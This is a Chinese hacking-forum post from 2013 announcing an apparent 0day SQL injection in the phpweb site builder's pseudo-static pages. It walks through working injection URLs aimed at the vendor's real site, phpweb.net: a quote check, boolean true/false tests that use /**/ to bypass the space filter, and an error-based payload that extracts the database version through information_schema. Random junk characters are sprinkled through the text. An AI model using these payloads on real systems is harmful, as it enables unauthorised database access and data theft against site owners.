找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
返回列表 发新帖
查看: 2785|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入1 ?% A: m* Z7 U: T/ b# N+ B( ~
+ B5 Z0 l0 G0 R6 q% f
主站:http://phpweb.net/
4 q( P' P$ {3 U2 q0 t9 s( X! ^6 G加’检测:
; e7 o, D& k! C# L* G % P5 E1 T& U+ n" B
http://www.phpweb.net/down/html/?772′.html
2 }; P5 m, Y0 s* q- q, x 6 Y, M2 l% J5 N* d
出错' w& f) s& x3 e) z7 A; G
存在注入。
  g3 a: |4 O* A5 k, O- l7 w$ C  T$ e不能用空格,只能用/*罗0 k7 p3 K7 T0 E. q* x" ]$ G3 X; p
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
% ?7 |8 v5 y# W( ~. L 0 t6 q4 {  v3 O) Y. R
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
5 O% l# x) `2 x; k5 y" F5 y3 B; F爆数据库版本:
+ G1 a0 \; v9 ?, d( l 1 i; w. ^" R( M
?
' w6 z# ^( `) n& o$ t" B  v9 K1
6 x9 ~& R0 v. X5 J' i4 zhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html+ ]2 h3 a) f/ J, n# n" g% _
更新日期: 2013-01-03 13:39:50        
; V9 A/ E/ C/ T  b/ w$ k/ p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表